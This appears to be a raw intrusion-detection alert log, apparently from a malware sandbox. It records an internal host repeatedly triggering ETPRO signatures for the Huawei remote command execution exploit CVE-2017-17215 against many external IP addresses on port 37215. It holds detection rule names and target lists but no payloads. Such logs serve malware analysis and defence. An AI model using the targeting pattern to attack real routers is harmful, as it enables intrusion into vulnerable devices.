                                                    07/10/24-08:27:33.802281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933237215192.168.2.14197.108.215.105
                                                    07/10/24-08:27:11.476399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3583437215192.168.2.14157.157.7.124
                                                    07/10/24-08:26:42.376307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917637215192.168.2.14157.128.138.143
                                                    07/10/24-08:26:29.846254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5004637215192.168.2.14112.215.26.210
                                                    07/10/24-08:27:13.857509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5304237215192.168.2.1493.2.2.48
                                                    07/10/24-08:27:10.631590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4272237215192.168.2.14154.19.85.27
                                                    07/10/24-08:27:19.234449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3303237215192.168.2.14197.67.101.193
                                                    07/10/24-08:26:23.358335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4768637215192.168.2.1463.243.153.203
                                                    07/10/24-08:26:33.231407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4117437215192.168.2.1441.122.247.128
                                                    07/10/24-08:27:05.109187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222237215192.168.2.1441.65.221.82
                                                    07/10/24-08:27:30.444942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3644837215192.168.2.1443.231.250.230
                                                    07/10/24-08:26:42.169251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5232637215192.168.2.14157.236.201.36
                                                    07/10/24-08:27:33.875122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4008637215192.168.2.1458.33.4.231
                                                    07/10/24-08:27:08.339308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559437215192.168.2.14120.32.22.196
                                                    07/10/24-08:26:15.863790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6069837215192.168.2.149.245.242.96
                                                    07/10/24-08:26:29.841336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4528437215192.168.2.1441.104.204.89
                                                    07/10/24-08:27:10.675558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3592837215192.168.2.1441.19.194.44
                                                    07/10/24-08:26:34.245285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3676037215192.168.2.14145.78.55.135
                                                    07/10/24-08:26:55.413827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4513837215192.168.2.1441.132.241.122
                                                    07/10/24-08:27:02.986988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3658237215192.168.2.14157.209.109.125
                                                    07/10/24-08:27:20.436388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4852637215192.168.2.14157.157.61.208
                                                    07/10/24-08:26:59.550215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5746237215192.168.2.1441.61.58.24
                                                    07/10/24-08:26:53.178125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359637215192.168.2.14123.90.193.249
                                                    07/10/24-08:26:55.415648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5525837215192.168.2.1499.44.140.37
                                                    07/10/24-08:26:59.541812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4859437215192.168.2.1445.19.166.45
                                                    07/10/24-08:27:11.538879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6024837215192.168.2.14198.134.35.167
                                                    07/10/24-08:27:14.675779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4595037215192.168.2.14197.15.154.226
                                                    07/10/24-08:26:53.117247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5159637215192.168.2.14160.192.87.180
                                                    07/10/24-08:26:25.522450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5328837215192.168.2.1439.164.41.239
                                                    07/10/24-08:26:13.824785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4632037215192.168.2.14197.133.195.116
                                                    07/10/24-08:26:13.837013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5430237215192.168.2.1441.69.222.164
                                                    07/10/24-08:26:15.870897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3928837215192.168.2.14157.60.122.210
                                                    07/10/24-08:27:05.179057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3655237215192.168.2.14132.113.254.255
                                                    07/10/24-08:27:05.191849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5559237215192.168.2.14157.246.87.42
                                                    07/10/24-08:26:29.878263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396237215192.168.2.14197.169.32.121
                                                    07/10/24-08:27:13.728066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4334637215192.168.2.14157.47.122.135
                                                    07/10/24-08:27:17.109836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414637215192.168.2.14157.249.138.25
                                                    07/10/24-08:27:20.483733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5595437215192.168.2.14197.92.171.0
                                                    07/10/24-08:27:10.609606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4593437215192.168.2.14197.145.197.85
                                                    07/10/24-08:26:28.650487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4210837215192.168.2.14213.123.152.115
                                                    07/10/24-08:27:17.035861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183637215192.168.2.1490.88.77.12
                                                    07/10/24-08:26:28.689305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694837215192.168.2.14112.212.117.44
                                                    07/10/24-08:26:38.554862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5794437215192.168.2.14203.116.135.27
                                                    07/10/24-08:26:59.646410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5497237215192.168.2.14197.207.108.170
                                                    07/10/24-08:27:05.156857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3601037215192.168.2.14157.109.124.69
                                                    07/10/24-08:27:10.617343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740037215192.168.2.14201.101.70.32
                                                    07/10/24-08:27:22.810148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4876637215192.168.2.14197.160.117.206
                                                    07/10/24-08:26:17.964931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906637215192.168.2.14143.4.50.136
                                                    07/10/24-08:26:15.863790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5148037215192.168.2.14157.55.20.78
                                                    07/10/24-08:27:07.356650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639237215192.168.2.14171.247.247.189
                                                    07/10/24-08:26:36.433814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4942437215192.168.2.14197.237.149.116
                                                    07/10/24-08:27:24.912875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3891037215192.168.2.1468.38.139.244
                                                    07/10/24-08:26:28.906532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738437215192.168.2.14157.10.6.73
                                                    07/10/24-08:26:43.549542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5971837215192.168.2.14157.113.85.82
                                                    07/10/24-08:27:05.127145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5572437215192.168.2.1495.93.12.251
                                                    07/10/24-08:27:28.064051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5451037215192.168.2.14157.223.44.198
                                                    07/10/24-08:26:57.675135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5847237215192.168.2.14157.69.17.145
                                                    07/10/24-08:26:14.622208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940037215192.168.2.14157.189.125.7
                                                    07/10/24-08:26:25.518059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966837215192.168.2.14157.170.168.181
                                                    07/10/24-08:27:07.380446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3663837215192.168.2.14157.75.233.181
                                                    07/10/24-08:26:43.848074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4377837215192.168.2.14157.25.169.67
                                                    07/10/24-08:26:33.237467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5253437215192.168.2.1441.138.43.145
                                                    07/10/24-08:26:57.612350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4980037215192.168.2.14157.219.86.92
                                                    07/10/24-08:26:55.426647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5006837215192.168.2.14197.215.85.74
                                                    07/10/24-08:26:52.021968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238837215192.168.2.1441.37.87.163
                                                    07/10/24-08:27:30.486593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629837215192.168.2.1441.37.60.185
                                                    07/10/24-08:26:36.422822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5502837215192.168.2.14141.247.34.58
                                                    07/10/24-08:27:22.936366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3547237215192.168.2.1431.137.143.181
                                                    07/10/24-08:27:24.958749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725837215192.168.2.1441.88.151.106
                                                    07/10/24-08:26:59.638467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3339437215192.168.2.14211.219.149.255
                                                    07/10/24-08:26:48.012833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3932037215192.168.2.14197.224.70.129
                                                    07/10/24-08:26:11.592748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3644837215192.168.2.144.157.212.68
                                                    07/10/24-08:27:13.914013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316037215192.168.2.14197.117.189.153
                                                    07/10/24-08:26:28.787399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4651837215192.168.2.14197.185.236.224
                                                    07/10/24-08:26:25.501206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628237215192.168.2.14157.255.225.244
                                                    07/10/24-08:27:13.714524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3632637215192.168.2.1485.72.217.44
                                                    07/10/24-08:26:22.242541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5737837215192.168.2.14118.235.102.70
                                                    07/10/24-08:26:25.429135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3511437215192.168.2.14119.24.201.252
                                                    07/10/24-08:26:42.346552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5560837215192.168.2.1441.81.63.140
                                                    07/10/24-08:26:49.834226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3434037215192.168.2.14195.19.48.178
                                                    07/10/24-08:27:13.970962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4498237215192.168.2.14157.186.120.6
                                                    07/10/24-08:27:14.865021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5205637215192.168.2.14197.18.237.11
                                                    07/10/24-08:26:25.501206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3643237215192.168.2.14172.68.90.187
                                                    07/10/24-08:26:28.638597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052637215192.168.2.14197.197.213.36
                                                    07/10/24-08:26:52.022558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3883437215192.168.2.14157.184.158.60
                                                    07/10/24-08:27:07.298138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3859437215192.168.2.14197.34.79.58
                                                    07/10/24-08:26:53.172651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3994837215192.168.2.14157.171.33.138
                                                    07/10/24-08:26:52.042445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5572837215192.168.2.1441.250.106.172
                                                    07/10/24-08:27:27.165104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5975837215192.168.2.1441.158.182.152
                                                    07/10/24-08:27:28.171262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966237215192.168.2.14157.95.7.216
                                                    07/10/24-08:26:33.237467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5192637215192.168.2.14151.114.138.174
                                                    07/10/24-08:27:33.980706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3805237215192.168.2.1437.152.6.232
                                                    07/10/24-08:27:32.591904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4422237215192.168.2.14157.83.16.191
                                                    07/10/24-08:27:07.292133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5701837215192.168.2.14121.16.72.208
                                                    07/10/24-08:27:31.527963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203837215192.168.2.14155.145.49.102
                                                    07/10/24-08:27:31.561522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4843637215192.168.2.1492.83.200.132
                                                    07/10/24-08:26:57.596939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5290837215192.168.2.1441.118.0.46
                                                    07/10/24-08:26:13.755859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600237215192.168.2.1441.98.121.110
                                                    07/10/24-08:26:22.260584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3893637215192.168.2.14157.64.237.237
                                                    07/10/24-08:26:33.225054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654637215192.168.2.1440.103.250.95
                                                    07/10/24-08:27:33.948971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3510037215192.168.2.14157.102.235.120
                                                    07/10/24-08:27:10.598272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831637215192.168.2.14157.253.130.57
                                                    07/10/24-08:26:28.843538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892437215192.168.2.1480.72.113.179
                                                    07/10/24-08:26:38.554861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4973837215192.168.2.1441.30.101.165
                                                    07/10/24-08:26:29.781420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5251037215192.168.2.14157.191.10.198
                                                    07/10/24-08:26:48.027883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062637215192.168.2.1441.15.28.41
                                                    07/10/24-08:26:28.891861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5508837215192.168.2.14174.109.17.162
                                                    07/10/24-08:26:25.464906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3765837215192.168.2.14177.110.34.223
                                                    07/10/24-08:27:13.887400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5215037215192.168.2.1441.244.74.159
                                                    07/10/24-08:27:30.468804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193237215192.168.2.14157.245.163.74
                                                    07/10/24-08:27:24.985938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3690037215192.168.2.1441.98.249.213
                                                    07/10/24-08:27:22.765325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5991637215192.168.2.14157.39.208.92
                                                    07/10/24-08:27:11.527474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024237215192.168.2.14157.243.152.158
                                                    07/10/24-08:27:11.562285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5611437215192.168.2.14185.90.194.139
                                                    07/10/24-08:26:11.619310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3670437215192.168.2.1441.92.120.108
                                                    07/10/24-08:27:11.551346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4066637215192.168.2.1441.41.213.231
                                                    07/10/24-08:26:47.824141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5051237215192.168.2.14197.241.4.242
                                                    07/10/24-08:26:23.347150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4181637215192.168.2.14197.168.9.158
                                                    07/10/24-08:27:02.973887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4970437215192.168.2.1441.225.21.106
                                                    07/10/24-08:26:22.287695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5106037215192.168.2.14157.55.136.132
                                                    07/10/24-08:27:22.487648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4046437215192.168.2.14197.71.66.235
                                                    07/10/24-08:26:51.988171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859437215192.168.2.1462.84.40.51
                                                    07/10/24-08:26:53.145765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727037215192.168.2.1441.161.220.192
                                                    07/10/24-08:26:33.171488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3789637215192.168.2.1441.117.155.126
                                                    07/10/24-08:27:10.617343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753237215192.168.2.1441.28.198.61
                                                    07/10/24-08:26:25.479455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434837215192.168.2.14157.33.195.14
                                                    07/10/24-08:27:14.881343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5459637215192.168.2.1441.248.40.61
                                                    07/10/24-08:27:28.121725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4134237215192.168.2.1441.198.64.98
                                                    07/10/24-08:27:02.868387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6002837215192.168.2.1431.10.41.171
                                                    07/10/24-08:26:33.243364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3569837215192.168.2.1441.99.167.157
                                                    07/10/24-08:27:22.807357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5545837215192.168.2.14197.205.34.196
                                                    07/10/24-08:26:51.964382TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732637215192.168.2.1441.221.143.161
                                                    07/10/24-08:26:57.501573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3728637215192.168.2.14197.92.59.68
                                                    07/10/24-08:26:26.618649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4003437215192.168.2.1441.215.24.109
                                                    07/10/24-08:26:59.634541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4106037215192.168.2.14157.226.225.51
                                                    07/10/24-08:27:07.270809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805037215192.168.2.1441.72.60.225
                                                    07/10/24-08:27:22.933807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4614837215192.168.2.1441.28.154.198
                                                    07/10/24-08:26:59.790586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5921437215192.168.2.1441.251.116.186
                                                    07/10/24-08:26:11.434490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201637215192.168.2.14157.8.45.235
                                                    07/10/24-08:26:28.693034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4529637215192.168.2.1441.32.68.125
                                                    07/10/24-08:27:32.556430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3672837215192.168.2.1438.111.190.64
                                                    07/10/24-08:26:49.808477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6028037215192.168.2.1453.96.149.57
                                                    07/10/24-08:27:10.739922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941637215192.168.2.14198.150.199.107
                                                    07/10/24-08:27:32.525366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5467837215192.168.2.14197.150.252.38
                                                    07/10/24-08:27:03.004303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4067037215192.168.2.14197.196.150.45
                                                    07/10/24-08:27:17.067488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5731237215192.168.2.14157.14.184.189
                                                    07/10/24-08:27:28.108861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5636037215192.168.2.1441.112.235.49
                                                    07/10/24-08:26:29.785606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355637215192.168.2.14157.216.88.149
                                                    07/10/24-08:26:42.180724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4964437215192.168.2.14159.19.241.182
                                                    07/10/24-08:27:13.999286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642637215192.168.2.14157.248.106.239
                                                    07/10/24-08:26:23.348137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3548037215192.168.2.14197.105.20.175
                                                    07/10/24-08:26:41.426322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4178237215192.168.2.14197.176.95.63
                                                    07/10/24-08:26:42.391743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5014637215192.168.2.14154.79.63.115
                                                    07/10/24-08:26:47.867621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3838637215192.168.2.14157.62.194.194
                                                    07/10/24-08:26:47.926462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5984637215192.168.2.14131.212.182.153
                                                    07/10/24-08:26:25.507737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3888437215192.168.2.14132.62.185.196
                                                    07/10/24-08:27:10.751291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530437215192.168.2.14126.218.174.70
                                                    07/10/24-08:26:15.857451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5531837215192.168.2.14197.122.2.35
                                                    07/10/24-08:27:17.087828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3665637215192.168.2.1441.29.202.237
                                                    07/10/24-08:26:22.281156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3562437215192.168.2.1441.0.16.90
                                                    07/10/24-08:26:38.617704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3959237215192.168.2.1441.172.233.254
                                                    07/10/24-08:26:28.855166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639237215192.168.2.14197.198.155.35
                                                    07/10/24-08:26:52.013790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4992237215192.168.2.14157.89.140.82
                                                    07/10/24-08:27:07.351462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5837837215192.168.2.1441.143.105.130
                                                    07/10/24-08:26:13.826034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5824237215192.168.2.14171.173.231.244
                                                    07/10/24-08:26:28.639081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3371837215192.168.2.14109.122.4.196
                                                    07/10/24-08:27:05.206516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5693037215192.168.2.1441.44.206.53
                                                    07/10/24-08:27:28.156575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3424237215192.168.2.14157.67.200.149
                                                    07/10/24-08:26:31.046147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990037215192.168.2.14157.152.209.194
                                                    07/10/24-08:26:59.852225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5039037215192.168.2.148.17.108.139
                                                    07/10/24-08:27:11.615687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5509837215192.168.2.1498.237.13.78
                                                    07/10/24-08:26:42.409730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4370837215192.168.2.14115.95.110.205
                                                    07/10/24-08:27:02.878785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5765637215192.168.2.1441.193.27.214
                                                    07/10/24-08:27:32.594360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772637215192.168.2.1447.99.106.1
                                                    07/10/24-08:26:13.787067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4282437215192.168.2.14197.147.101.74
                                                    07/10/24-08:26:42.437596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3665637215192.168.2.1454.135.32.126
                                                    07/10/24-08:26:41.281691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939837215192.168.2.14197.200.60.140
                                                    07/10/24-08:27:24.941876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677237215192.168.2.14157.158.187.224
                                                    07/10/24-08:26:41.410594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3305637215192.168.2.14157.155.142.161
                                                    07/10/24-08:27:02.914738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283037215192.168.2.14197.23.245.64
                                                    07/10/24-08:26:22.290306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4321837215192.168.2.14157.243.148.62
                                                    07/10/24-08:27:14.890469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3525037215192.168.2.14157.122.92.189
                                                    07/10/24-08:26:42.358435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503037215192.168.2.1441.65.104.202
                                                    07/10/24-08:26:25.497334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5648237215192.168.2.14157.119.85.157
                                                    07/10/24-08:27:28.070223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4893037215192.168.2.14129.51.178.1
                                                    07/10/24-08:26:23.359081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4502037215192.168.2.14197.11.199.34
